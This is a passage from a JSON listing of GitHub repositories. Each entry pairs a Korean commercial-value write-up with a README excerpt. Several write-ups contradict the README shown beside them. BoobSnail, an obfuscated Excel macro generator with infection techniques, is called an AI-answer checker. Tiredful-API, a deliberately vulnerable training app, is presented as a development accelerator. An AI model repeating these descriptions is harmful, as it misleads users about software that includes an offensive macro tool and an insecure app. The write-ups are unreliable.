1.9, tcpdump, libpcap libraries and headers as well as \nopenssl headers installed before starting.\n\n::\n\n    go get -u github.com/QUIC-Tracker/quic-tracker  # This will fail because of the missing dependencies that should be build using the 4 lines below\n    cd $GOPATH/src/github.com/mpiraux/pigotls\n    make\n    cd $GOPATH/src/github.com/mpiraux/ls-qpack-go\n    make\n\nThe test suite is run using t","composite_score":0.4124,"license_safety_tag":"risky"},{"name":"rasbt/python-machine-learning-book-2nd-edition","github_url":"https://github.com/rasbt/python-machine-learning-book-2nd-edition","stars":7,"language":"Jupyter Notebook","license":"mit","abandonment_months":69,"description":"# 파이썬 머신러닝 교과서 2판 - 가치 분석\n\n## 왜 보물인가\n초보자도 따라 할 수 있는 완전한 머신러닝 학습 자료로, 인공지능 기초를 배우고 싶은 수백만 명의 잠재 고객을 위한 교육 콘텐츠의 핵심 토대가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼 (SaaS)**: 이 자료를 기반으로 \"누구나 배우는 인공지능 기초\" 같은 유","readme_excerpt":"## Python Machine Learning (2nd Ed.) Code Repository\n\n[![Build Status](https://travis-ci.com/rasbt/python-machine-learning-book-2nd-edition.svg?token=zvSsJVLJFKzB2yqaeKN1&branch=master)](https://travis-ci.com/rasbt/python-machine-learning-book-2nd-edition)\n![Python 3.6](https://img.shields.io/badge/Python-3.6-blue.svg)\n![License](https://img.shields.io/badge/Code%20License-MIT-blue.svg)\n\n\n*Please note that a new edition (3rd edition) is now available as of December 2019. The code repository link for the 3rd edition is https://github.com/rasbt/python-machine-learning-book-3rd-edition.*\n\n\n**Python Machine Learning, 2nd Ed.**  \n\npublished September 20th, 2017\n\nPaperback: 622 pages  \nPublisher: Packt Publishing  \nLanguage: English\n\nISBN-10: 1787125939  \nISBN-13: 978-1787125933  \nKindle ASIN: B0742K7HYF  \n\n[<img src=\"./images/cover_1.jpg\" width=\"348\">](https://www.amazon.com/Python-Machine-Learning-scikit-learn-TensorFlow/dp/1787125939)\n\n\n## Links\n\n- [Amazon Page](https://www.amazon.com/Pyt","composite_score":0.4123,"license_safety_tag":"safe"},{"name":"STMSolutions/boobsnail","github_url":"https://github.com/STMSolutions/boobsnail","stars":5,"language":"Python","license":"MIT","abandonment_months":15,"description":"# boobsnail 저장소 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 답변이 정말 정확한지 자동으로 검증해주는 도구로, 잘못된 정보가 나갈 위험을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 지원 챗봇이 주는 답변의 정확성을 실시간으로 검증하는 품질 관리 기능\n- **내부 업무 도구**: 회사 직원들이 AI를 사용할","readme_excerpt":"![License](https://img.shields.io/badge/license-MIT-lightgrey.svg)\n\nFollow us on [Twitter](https://twitter.com/stm_cyber)!\n\n# BoobSnail\nBoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.\nFeatures:\n- various infection techniques;\n- various obfuscation techniques;  \n- translation of formulas into languages other than English;\n- can be used as a library - you can easily write your own generator.\n \n## Building and Running\nTested on: Python 3.8.7rc1\n```\npip install -r requirements.txt\npython boobsnail.py\n___.                ___.     _________             .__.__\n\\_ |__   ____   ____\\_ |__  /   _____/ ____ _____  |__|  |\n | __ \\ /  _ \\ /  _ \\| __ \\ \\_____  \\ /    \\__  \\ |  |  |\n | \\_\\ (  <_> |  <_> ) \\_\\ \\/        \\   |  \\/ __ \\|  |  |__\n |___  /\\____/ \\____/|___  /_______  /___|  (____  /__|____/\n     \\/                  \\/        \\/     \\/     \\/\n     Author: @_mzer0 @stm_cyber\n     (...)\n```\n## Generators usage\n\n``","composite_score":0.4123,"license_safety_tag":"safe"},{"name":"lukehoban/es6features","github_url":"https://github.com/lukehoban/es6features","stars":19,"language":"","license":"mit","abandonment_months":40,"description":"# es6features 저장소 분석\n\n## 왜 보물인가\n현대 웹 개발의 기초가 되는 자바스크립트 신기능들을 배우기 위한 가장 간단하고 명확한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급 개발자 대상 자바스크립트 기초 강좌의 교재로 제공\n2. **기업 신입 교육 프로그램**: 웹 개발팀 신입사원들의 필수 학습 자","readme_excerpt":"# ECMAScript 6 <sup>[git.io/es6features](http://git.io/es6features)</sup>\n\n## Introduction\nECMAScript 6, also known as ECMAScript 2015, is the latest version of the ECMAScript standard.  ES6 is a significant update to the language, and the first update to the language since ES5 was standardized in 2009. Implementation of these features in major JavaScript engines is [underway now](http://kangax.github.io/es5-compat-table/es6/).\n\nSee the [ES6 standard](http://www.ecma-international.org/ecma-262/6.0/) for full specification of the ECMAScript 6 language.\n\nES6 includes the following new features:\n- [arrows](#arrows)\n- [classes](#classes)\n- [enhanced object literals](#enhanced-object-literals)\n- [template strings](#template-strings)\n- [destructuring](#destructuring)\n- [default + rest + spread](#default--rest--spread)\n- [let + const](#let--const)\n- [iterators + for..of](#iterators--forof)\n- [generators](#generators)\n- [unicode](#unicode)\n- [modules](#modules)\n- [module loaders](#module-loade","composite_score":0.4123,"license_safety_tag":"safe"},{"name":"fossasia/susper.com","github_url":"https://github.com/fossasia/susper.com","stars":13,"language":"TypeScript","license":"LGPL-2.1","abandonment_months":39,"description":"# Susper.com 저장소 분석\n\n## 왜 보물인가\n개인정보를 보호하면서 검색할 수 있는 독립적인 검색 엔진으로, 대형 검색사의 의존도에서 벗어나고 싶은 사용자들의 수요가 증가하는 시점에 매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프라이버시 중심 검색 플랫폼으로 개인 사용자와 기업에 월 구독료를 받고 서비스 제공\n2. **내","readme_excerpt":"![susper.com](src/assets/images/susper.svg)\n\nmaster: [![Build Status](https://travis-ci.org/fossasia/susper.com.svg?branch=master)](https://travis-ci.org/fossasia/susper.com)\ndevelopment: [![Build Status](https://travis-ci.org/fossasia/susper.com.svg?branch=development)](https://travis-ci.org/fossasia/susper.com)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/2ba119419e7444b3b505bb37b4525deb)](https://www.codacy.com/app/shiven15094/susper-com?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/susper.com&amp;utm_campaign=Badge_Grade)\n[![Code Climate](https://codeclimate.com/github/fossasia/susper.com/badges/gpa.svg?branch=gh-pages)](https://codeclimate.com/github/fossasia/susper.com)\n[![codecov](https://codecov.io/gh/fossasia/susper.com/branch/master/graph/badge.svg)](https://codecov.io/gh/fossasia/susper.com)\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susper.com?utm_source=badge&utm_medium=badge&utm_campaign=pr-badg","composite_score":0.4122,"license_safety_tag":"restricted"},{"name":"se/sudoku-solver","github_url":"https://github.com/se/sudoku-solver","stars":5,"language":"Go","license":"unknown","abandonment_months":91,"description":"# Sudoku Solver 저장소 분석\n\n## 왜 보물인가\n수도쿠 같은 복잡한 논리 퍼즐을 컴퓨터가 자동으로 푸는 기술로, 인공지능의 문제 해결 능력을 보여주는 핵심 사례입니다.\n\n## 어디에 쓸 수 있나\n1. **퍼즐 게임 앱 서비스**: 수도쿠, 크로스워드 등 퍼즐 게임에 자동 풀이 기능 제공\n2. **교육용 내부 도구**: 학교에서 수학/논리 학습용","readme_excerpt":"# Sudoku Çözücü - Go (Golang)\n\n![https://github.com/orcaman/financial](images/golang-math.png)\n\nResmen ruh çözücü gibi oldu başlığı. Bu yüzden bu tarz şeylere Türkçe isimler vermeyi garip buluyorum 😅\n\nNeyse, her şey [@Protein_Team](https://twitter.com/Protein_Team)'in mini hackaton'u ile başladı... Ne kadar da güzel hikayeleştirmek 🙂.\n\nNeyse, kodlar kendini anlatıyor.\n\nKullanılan algoritma backtracking algoritması. Şuradan detaylı bilgiye ulaşmak mümkün https://en.wikipedia.org/wiki/Backtracking#Examples\n\nHızlı bir şekilde (eğer bilgisayarınızda go yüklü ise) aşağıdaki komutu çağırarak doğrudan çalıştırabilirsiniz.\n\n```sh\ngo get -u github.com/se/sudoku-solver\n```\n\nSonrasında tek yapmanız gereken terminalinizde aşağıdaki komutu yazmak;\n\n```sh\nsudoku-solver\n```\n\nhttps://github.com/dimitri/sudoku/blob/master/sudoku.txt adresinden örnek sudoku textlerine ulaşabilirsiniz.\n\nTek yapmanız gereken build ettikten sonra tek satır halinde kodları vermek.\n\nÖrneğin;\n\n```sh\ngo build\n./sudoku-solver 0","composite_score":0.4117,"license_safety_tag":"unknown"},{"name":"lenve/JavaEETest","github_url":"https://github.com/lenve/JavaEETest","stars":5,"language":"Java","license":"unknown","abandonment_months":37,"description":"# JavaEETest 저장소 분석\n\n## 왜 보물인가\n기업 업무 시스템을 구축할 때 필수적인 Java 기술의 실제 사용 사례와 테스트 방법을 담은 실무 참고서입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 클라우드 관리 시스템 개발 시 안정성 검증용 템플릿 판매\n- **내부 업무 도구**: 중소기업의 전사적 자원관리(ERP) 시스템","readme_excerpt":"### 关注公众号，第一时间获取最新文章\n![qrcode_for_gh_d1ca11234a30_258](https://cloud.githubusercontent.com/assets/6023444/23211124/6d97cca2-f93b-11e6-9438-57ef23454f18.jpg)  \n\n### 欢迎小伙伴star另外两个前后端分离的SpringBoot项目  \n\n[【1.V部落，Vue+SpringBoot实现的多用户博客管理平台!】](https://github.com/lenve/VBlog)  \n[【2.vhr,微人事是一个前后端分离的人力资源管理系统，项目采用SpringBoot+Vue开发。】](https://github.com/lenve/vhr)  \n\n### 案例详解地址\n|案例|案例详解地址|\n|-------------|:-------------:|\n|Test4|[Spring基础配置](http://blog.csdn.net/u012702547/article/details/53587684)|\n|Test5|[Spring基础配置](http://blog.csdn.net/u012702547/article/details/53587684)|\n|Test6-AOP|[Spring基础配置](http://blog.csdn.net/u012702547/article/details/53587684)|\n|Test6-AOP|[Spring基础配置](http://blog.csdn.net/u012702547/article/details/53587684)|\n|Test7-Scope|[Spring常用配置](http://blog.csdn.net/u012702547/article/details/53633872)|\n|Test8-EL|[Spring常用配置](http://blog.csdn.net/u012702547/article/details/53633872)|\n|Test9-BeanLiftCycle|[Spring常用配置](http://blog.csdn.net/u012702547/article/details/53633872)|\n|Tes","composite_score":0.4113,"license_safety_tag":"unknown"},{"name":"browserify/rustify","github_url":"https://github.com/browserify/rustify","stars":6,"language":"JavaScript","license":"Apache-2.0","abandonment_months":17,"description":"# Rustify 저장소 분석\n\n## 왜 보물인가\n웹 개발에서 느린 작업을 빠르게 처리할 수 있도록 자동으로 변환해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 SaaS**: 개발자들이 코드 최적화 작업을 자동으로 처리하는 클라우드 서비스로 판매\n2. **기업 개발팀 도구**: 대규모 소프트웨어 회사의 내부 개발 속도 향상 도구로 제공\n3.","readme_excerpt":"# rustify\n[![npm version][2]][3] [![build status][4]][5]\n[![downloads][8]][9] [![js-standard-style][10]][11]\n\nRust WebAssembly transform for\n[Browserify](https://github.com/browserify/browserify). Because this is an\nunstable rust feature, at the time of writing it relies on\n[wasm-gc](https://github.com/alexcrichton/wasm-gc) to be available from the\ncommand line. See [Installation](#installation) for instructions on how to\ninstall. Probably also doesn't work on Windows.\n\nBecause this feature is experimental in Rust, this module should be considered\nsimilarly.\n\n## Usage\n```sh\n$ browserify -t rustify index.js > bundle.js\n```\n```js\n// index.js\nvar rust = require('rustify')\n\nvar wasm = rust`\n  #[no_mangle]\n  pub fn add_one(x: i32) -> i32 {\n    x + 1\n  }\n`\n\nWebAssembly.instantiate(wasm, {})\n  .then(function (res) {\n    var addOne = res.instance.exports.add_one\n    console.log(addOne(41))\n    console.log(addOne(68))\n  }).catch(function (e) {\n    console.error('Creating WASM module failed', e)","composite_score":0.4112,"license_safety_tag":"safe"},{"name":"buqiyuan/buqiyuan.github.io","github_url":"https://github.com/buqiyuan/buqiyuan.github.io","stars":14,"language":"HTML","license":"unknown","abandonment_months":20,"description":"# buqiyuan/buqiyuan.github.io 분석 보고서\n\n## 왜 보물인가\n개인 블로그/포트폴리오 저장소로, 개발자가 자신의 경험과 지식을 정리하고 공유하는 디지털 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 브랜딩 플랫폼**: 개발자나 전문가가 자신의 경력, 프로젝트, 학습 내용을 웹사이트로 운영\n2. **기술 블로그 서비스**: 누구","readme_excerpt":"","composite_score":0.4105,"license_safety_tag":"unknown"},{"name":"dennybritz/cnn-text-classification-tf","github_url":"https://github.com/dennybritz/cnn-text-classification-tf","stars":8,"language":"Python","license":"apache-2.0","abandonment_months":26,"description":"# CNN 텍스트 분류 TensorFlow - 상용화 분석\n\n## 왜 보물인가\n텍스트를 자동으로 분류하는 인공지능 기술로, 고객 의견 분석이나 이메일 자동 분류 같은 비즈니스 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 이커머스 플랫폼이 고객 리뷰를 자동으로 긍정/부정/중립으로 분류하는 감정 분석 SaaS\n**2.","readme_excerpt":"**[This code belongs to the \"Implementing a CNN for Text Classification in Tensorflow\" blog post.](http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/)**\n\nIt is slightly simplified implementation of Kim's [Convolutional Neural Networks for Sentence Classification](http://arxiv.org/abs/1408.5882) paper in Tensorflow.\n\n## Requirements\n\n- Python 3\n- Tensorflow > 0.12\n- Numpy\n\n## Training\n\nPrint parameters:\n\n```bash\n./train.py --help\n```\n\n```\noptional arguments:\n  -h, --help            show this help message and exit\n  --embedding_dim EMBEDDING_DIM\n                        Dimensionality of character embedding (default: 128)\n  --filter_sizes FILTER_SIZES\n                        Comma-separated filter sizes (default: '3,4,5')\n  --num_filters NUM_FILTERS\n                        Number of filters per filter size (default: 128)\n  --l2_reg_lambda L2_REG_LAMBDA\n                        L2 regularizaion lambda (default: 0.0)\n  --dropout_keep_prob DROPOUT_KEEP_PRO","composite_score":0.4096,"license_safety_tag":"safe"},{"name":"fossasia/meilix","github_url":"https://github.com/fossasia/meilix","stars":11,"language":"Python","license":"LGPL-3.0","abandonment_months":77,"description":"# Meilix 저장소 분석\n\n## 왜 보물인가\n사용자 맞춤형 리눅스 운영체제를 웹에서 간단하게 만들 수 있는 도구로, 기술 지식 없이도 자신만의 컴퓨터 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 운영체제 빌더**\n사용자가 브라우저에서 원하는 기능을 선택하면 자동으로 리눅스 시스템을 생성해 다운로드할","readme_excerpt":"# Meilix\n<p>\n    <img align= \"left\" src=\"./docs/meilix.png\" width=\"160\">\n    A beautiful and customizable Linux build for out of the box features for an Internet Kiosk. You can use the Meilix Generator (Web app) to make a Linux for your own brand/event, also add apps and features you need pre-installed, it will create an ISO Image of your Linux, which you can use as a live boot or install on PCs. \n</p><br>\n\n[![Join the chat at https://gitter.im/fossasia/meilix](https://badges.gitter.im/fossasia/meilix.svg)](https://gitter.im/fossasia/meilix?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Build Status](https://travis-ci.org/fossasia/meilix.svg?branch=master)](https://travis-ci.org/fossasia/meilix)\n \n\n`Meilix is under heavy development. It is in alpha stage and not yet recommended for productive use.`\n\n# Index\n\n1. [Introduction](#introduction)\n    1. [Features](#feature)\n    2. [Architecture](#architecture)\n    3. [Ecosystem](#ecosystem)\n2. [Usage](#usage)\n3","composite_score":0.4085,"license_safety_tag":"restricted"},{"name":"ikostoski/esp32-i2s-slm","github_url":"https://github.com/ikostoski/esp32-i2s-slm","stars":304,"language":"C++","license":"GPL-3.0","abandonment_months":59,"description":"# esp32-i2s-slm 프로젝트 분석\n\n## 왜 보물인가\n저렴한 마이크로칩만으로 정확한 소음 측정기를 직접 만들 수 있는 오픈소스 설계도입니다.\n\n## 어디에 쓸 수 있나\n\n1. **건설/공장 안전 모니터링 SaaS**: 현장의 ESP32 센서로 실시간 소음 데이터를 수집하고, 클라우드 대시보드에서 위험 수준을 추적하는 구독 서비스\n\n2. **실내 환","readme_excerpt":"# Sound Level Meter with Arduino IDE, ESP32 and I<sup>2</sup>S MEMS microphone\n\nArduino/ESP32 Sound Level Meter (SLM) using inexpensive, factory calibrated, digital I2S MEMS microphone and digital IIR filters (vs. FFT) for equalization and A-weighting.\n\nThe basic idea is:\n\n![Basic principle](./misc/esp32-i2s-slm-bp.svg)\n\nAnd the microphone response after equalization should look like:\n\n![Adjusted frequency response](./misc/ics-43434-afr.svg)\n\nTheoretically, i.e. with factory calibrated ICS-4343x, this should get you ±1dB(A) measurement within 20Hz-20KHz range.\n\nThe code in this repository is mostly intended as example how you can integrate resonable noise measurement (i.e. *L*<sub>Aeq</sub>, Equivalent Continuous Sound Level) in your projects. \n\nYou can find a bit more information in my [hackday.io](https://hackaday.io/project/166867-esp32-i2s-slm) project.\n","composite_score":0.4085,"license_safety_tag":"restricted"},{"name":"fossasia/gci17.fossasia.org","github_url":"https://github.com/fossasia/gci17.fossasia.org","stars":12,"language":"CSS","license":"LGPL-3.0","abandonment_months":44,"description":"# fossasia/gci17.fossasia.org 분석\n\n## 왜 보물인가\nFOSSASIA(아시아 오픈소스 커뮤니티)의 공식 행사 웹사이트로, 글로벌 기술 인재 발굴 및 교육 플랫폼으로서 재활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 경진대회 플랫폼**: 개발자 양성 기관이나 대학교에서 학생 코딩 대회 및 채용 연계 시스템으로 운영\n","readme_excerpt":"# FOSSASIA GCI 2017 Site\r\n[![Build Status](https://travis-ci.org/fossasia/gci17.fossasia.org.svg?branch=gh-pages)](https://travis-ci.org/fossasia/gci17.fossasia.org)\r\n\r\n## Adding a Mentor\r\nTo add a mentor open the file `mentors.yml` in `_data` folder and please maintain the following format *EXACTLY* (replacing values where indicated):\r\n\r\n```yaml\r\n- name: Mentor's name\r\n  github: Mentor's Github username\r\n  image: Mentor's image\r\n  twitter: Mentor's Twitter id\r\n  facebook: Mentor's Facebook id\r\n  Linkedin: Mentor's Linkedin Page\r\n\r\n  Geolocation (city or country: optional)\r\n  lat: Mentor's latitude\r\n  lng: Mentor's longitude\r\n```\r\n**IMPORTANT:**\r\n- All images must be optimized before uploaded to the repository via commit or Pull Request. You may use any image optimizer of your choice.\r\n- All images must be in `img/mentors`.\r\n- The images must be 240 x 240 pixels.\r\n- If you do not want to include your social media accounts or coordinates , please do not provide empty fields like `facebo","composite_score":0.4083,"license_safety_tag":"restricted"},{"name":"antfu/esno","github_url":"https://github.com/antfu/esno","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":20,"description":"# antfu/esno 분석 보고서\n\n## 왜 보물인가\nJavaScript 코드를 간단하게 실행할 수 있는 도구로, 개발자들이 빠르게 코드를 테스트하고 학습할 때 시간을 대폭 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코드 학습 플랫폼**: 프로그래밍 입문자들이 브라우저에서 바로 코드를 작성하고 결과를 확인하는 교육 SaaS\n2. **","readme_excerpt":"<h1 align='center'>\n<samp>esno</samp>\n</h1>\n\n<p align='center'>\n  <samp>Node.js runtime enhanced with esbuild for loading TypeScript & ESM</samp>\n<br>\n<br>\n<a href='https://www.npmjs.com/package/esno'>\n<img src='https://img.shields.io/npm/v/esno?color=333&labelColor=555&style=flat-square' alt='version'/>\n</a>\n</p>\n\nFrom v0.15, `esno` is essentially an alias of [`tsx`](https://github.com/esbuild-kit/tsx), with automated CJS/ESM mode and caching.\n\n> Issues are disabled in this repo, they should be report in [esbuild-kit/tsx](https://github.com/esbuild-kit/tsx) instead.\n\n## Usage\n\n```bash\nnpx esno hello.ts\n```\n\n#### Install globally\n\n```bash\nnpm i -g esno\n\nesno index.ts\n```\n\n#### Install as dependency\n\n```bash\nnpm i esno\n```\n\n```json\n{\n  \"scripts\": {\n    \"start\": \"esno index.ts\"\n  },\n  \"dependencies\": {\n    \"esno\": \"*\"\n  }\n}\n```\n\nLearn more at [`tsx`](https://github.com/esbuild-kit/tsx).\n","composite_score":0.408,"license_safety_tag":"unknown"},{"name":"meilix/meilix-addons","github_url":"https://github.com/meilix/meilix-addons","stars":11,"language":"Jupyter Notebook","license":"MIT","abandonment_months":17,"description":"# meilix-addons 분석 보고서\n\n## 왜 보물인가\nMeilix 운영체제를 더욱 강력하게 만들어주는 추가 기능들을 모아놓은 공개 도구 모음으로, 누구나 자유롭게 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **운영체제 커스터마이징 서비스**: 개인 또는 기업의 컴퓨터를 특정 용도에 맞게 설정해주는 유료 서비스로 이 애드온들을 활용","readme_excerpt":"# PSLab Notebooks\n\nThis repository (<https://github.com/fossasia/pslab-notebooks>) contains a series\nof tutorials and exercises for the [Pocket Science Lab](<https://pslab.io>)\n(PSLab) [Python library](<https://github.com/fossasia/pslab-python>).\n\n## Downloading the notebooks\n\nDownload the tutorial notebooks by either\n\n- `git clone`ing this repository (<https://github.com/fossasia/pslab-notebooks>)\n- `cd` into it\n\nor\n\n- Download this repository as a ZIP archive by clicking the green\n  '<> Code'-button in the Github web interface, and then select \"Download ZIP\"\n- Unpack the ZIP archive and `cd` into it\n\n## Requirements\n\nThe following software is required to run the notebooks:\n\n- Python 3.9 or later\n- On some Linux distributions (notably Debian, Ubuntu) the packages\n  `python3-pip` and `python3-venv` must be installed from the distribution's\n  repositories\n\n### Additional Linux-specific requirements\n\nWindows and MacOS users can skip this section.\n\nYour user most likely does not have perm","composite_score":0.4078,"license_safety_tag":"safe"},{"name":"payatu/Tiredful-API","github_url":"https://github.com/payatu/Tiredful-API","stars":82,"language":"Python","license":"GPL-3.0","abandonment_months":60,"description":"# Tiredful-API 상용화 분석\n\n## 왜 보물인가\n웹 서비스 개발자들이 반복적으로 작성해야 하는 데이터 처리 기능을 자동으로 만들어주는 도구라서, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발 플랫폼**: 스타트업이 자신의 앱을 만들 때 이 API를 기반으로 개발하면 시간 절약\n2. **기업 내부 업무 자","readme_excerpt":"### What is Tiredful API?\n\nTiredful API is intentionally designed broken app. The aim of this web app is to teach developers, QA  or security professionals about flaws present in webservices (REST API) due to insecure coding practice.\n\n![Tiredful API image](./Tiredful-API.jpg)\n\n### Who can use Tiredful API?\n* Web developers\n* Web Pentesters\n* Security Professionals\n* Student\n\n### What is included in Tiredful API?\n\nI tried to cover most of the vulnerabilities, I am sure that we have missed some vulnerabilities.Please ping me if you know any good vulnerability that should be included. For now I have included following vulnerabilities.\n\n* Information Disclosure\n* Insecure Direct Object Reference\n* Access Control\n* Throttling\n* SQL Injection (SQLite)\n* Cross Site Scripting.\n\n[You can see solution here](https://payatu.com/tiredful-api-solution/)\n\n### Can I contribute?\nYes, you can help by sending us the details of vulnerabilities that we can implement in future versions of Tiredful API. Ple","composite_score":0.4074,"license_safety_tag":"restricted"},{"name":"fossasia/publiccode.asia","github_url":"https://github.com/fossasia/publiccode.asia","stars":12,"language":"JavaScript","license":"GPL-3.0","abandonment_months":60,"description":"# PublicCode.Asia 저장소 분석\n\n## 왜 보물인가\n아시아 지역의 공공 소프트웨어 프로젝트들을 한 곳에서 발견하고 공유할 수 있는 플랫폼으로, 정부와 시민단체들이 중복 개발을 피하고 협력할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n**1) SaaS 서비스:** 아시아 정부기관들이 구독하여 공공 소프트웨어 카탈로그를 검색하고 관리하는 웹 플","readme_excerpt":"# Public Money Public Code – publiccode.asia\n\n[![Build Status](https://travis-ci.org/fossasia/publiccode.asia.svg?branch=master)](https://travis-ci.org/fossasia/publiccode.asia)\n\nThis is the website of \"Public Money, Public Code\" [publiccode.asia](https://publiccode.asia). It is based on [Hugo](https://gohugo.io).\n\n\n## Table of Contents\n\n- [Contribute](#contribute)\n- [Translate](#translate)\n- [Build](#build)\n- [HowTos and FAQs](#howtos-and-faqs)\n- [Licence](#licence)\n\n\n## Contribute\n\n### Prerequisites\n\nIn order to modify the website, you need `hugo` and `git` installed on your\ncomputer. If Hugo isn't available in your package manager, obtain it from its\n[official website](https://gohugo.io). We tested the website build with Hugo\nfrom version 0.20.7 upwards. Please make sure that you use an as recent version\nas possible to avoid errors.\n\n## Issue and Branch Policy\n\nBefore making a pull request, please file an issue. So, other developers have the chance to give feedback or discuss detail","composite_score":0.4072,"license_safety_tag":"restricted"},{"name":"cognetwork-dev/Metallic","github_url":"https://github.com/cognetwork-dev/Metallic","stars":191,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":20,"description":"","readme_excerpt":"","composite_score":0.4071,"license_safety_tag":"risky"},{"name":"wurstmeister/kafka-docker","github_url":"https://github.com/wurstmeister/kafka-docker","stars":6,"language":"Shell","license":"apache-2.0","abandonment_months":25,"description":"# kafka-docker 분석 보고서\n\n## 왜 보물인가\n대규모 데이터를 실시간으로 처리하고 저장하는 핵심 기술을 누구나 쉽게 설치할 수 있도록 패키징한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 데이터 분석 SaaS**\n- 고객의 행동 데이터를 즉시 수집하고 분석하는 대시보드 서비스\n- 주식 시세, 날씨, 뉴스 등 계속 변하는 정보를 실시","readme_excerpt":"[![Docker Pulls](https://img.shields.io/docker/pulls/wurstmeister/kafka.svg)](https://hub.docker.com/r/wurstmeister/kafka/)\n[![Docker Stars](https://img.shields.io/docker/stars/wurstmeister/kafka.svg)](https://hub.docker.com/r/wurstmeister/kafka/)\n[![](https://images.microbadger.com/badges/version/wurstmeister/kafka.svg)](https://microbadger.com/images/wurstmeister/kafka \"Get your own version badge on microbadger.com\")\n[![](https://images.microbadger.com/badges/image/wurstmeister/kafka.svg)](https://microbadger.com/images/wurstmeister/kafka \"Get your own image badge on microbadger.com\")\n[![Build Status](https://app.travis-ci.com/wurstmeister/kafka-docker.svg?branch=master)](https://app.travis-ci.com/wurstmeister/kafka-docker)\n\n\nkafka-docker\n============\n\nDockerfile for [Apache Kafka](http://kafka.apache.org/)\n\nThe image is available directly from [Docker Hub](https://hub.docker.com/r/wurstmeister/kafka/)\n\nTags and releases\n-----------------\n\nAll versions of the image are built from the","composite_score":0.407,"license_safety_tag":"safe"},{"name":"jdg/MBProgressHUD","github_url":"https://github.com/jdg/MBProgressHUD","stars":7,"language":"Objective-C","license":"mit","abandonment_months":22,"description":"# MBProgressHUD 상용화 분석\n\n## 왜 보물인가\n앱 사용자가 기다리는 동안 진행 상황을 시각적으로 보여주는 필수 UI 도구로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 파일 업로드, 데이터 처리 중 진행률을 표시하는 웹·앱 기반 클라우드 서비스\n2. **내부 업무 도구**: 회사 직원들이 사용","readme_excerpt":"# MBProgressHUD\n\n[![Build Status](https://travis-ci.org/matej/MBProgressHUD.svg?branch=master)](https://travis-ci.org/matej/MBProgressHUD) [![codecov.io](https://codecov.io/github/matej/MBProgressHUD/coverage.svg?branch=master)](https://codecov.io/github/matej/MBProgressHUD?branch=master)\n [![SwiftPM compatible](https://img.shields.io/badge/SwiftPM-compatible-brightgreen.svg)](https://github.com/apple/swift-package-manager) [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage#adding-frameworks-to-an-application) [![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio) [![CocoaPods compatible](https://img.shields.io/cocoapods/v/MBProgressHUD.svg?style=flat)](https://cocoapods.org/pods/MBProgressHUD) [![License: MIT](https://img.shields.io/cocoapods/l/MBProgressHUD.svg?style=flat)](http://opensource.org/licenses/MIT)\n\n`MBProgressHUD` is an i","composite_score":0.4068,"license_safety_tag":"safe"},{"name":"CodisLabs/codis","github_url":"https://github.com/CodisLabs/codis","stars":6,"language":"Go","license":"mit","abandonment_months":26,"description":"# Codis 저장소 분석\n\n## 왜 보물인가\n대규모 온라인 서비스에서 데이터를 빠르게 찾고 저장할 수 있게 도와주는 핵심 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 수백만 명의 사용자가 동시에 상품을 검색하고 장바구니를 업데이트할 때 시스템 속도 개선\n2. **게임 서비스**: 플레이어의 순위표, 보유 아이템, 게임 진행","readme_excerpt":"<img src=\"doc/pictures/logo-3.png\" height=80></img>\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/CodisLabs/codis?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://travis-ci.org/CodisLabs/codis.svg)](https://travis-ci.org/CodisLabs/codis)\n\nCodis is a proxy based high performance Redis cluster solution written in Go. It is production-ready and widely used at [wandoujia.com](http://wandoujia.com) and many companies. You can see [Codis Releases](https://github.com/CodisLabs/codis/releases) for latest and most stable realeases.\n\n## Donation\nDonate if you want to help us maintaining this project. Thank you!\n[See this issue for details](https://github.com/CodisLabs/codis/issues/976)\n\n## Compared with Twemproxy and Redis Cluster\n<table>\n<tr><th></th><th>Codis</th><th>Twemproxy</th><th>Redis Cluster</th></tr>\n<tr><td>resharding without restarting cluster</td><td>Yes</td><td>No</td><td>Yes</td></tr>\n<tr><td>pipeline</t","composite_score":0.4066,"license_safety_tag":"safe"},{"name":"fossasia/susi_skill_cms","github_url":"https://github.com/fossasia/susi_skill_cms","stars":13,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":74,"description":"# SUSI Skill CMS 분석 보고서\n\n## 왜 보물인가\n인공지능이 새로운 기능을 배우도록 가르칠 수 있는 플랫폼으로, 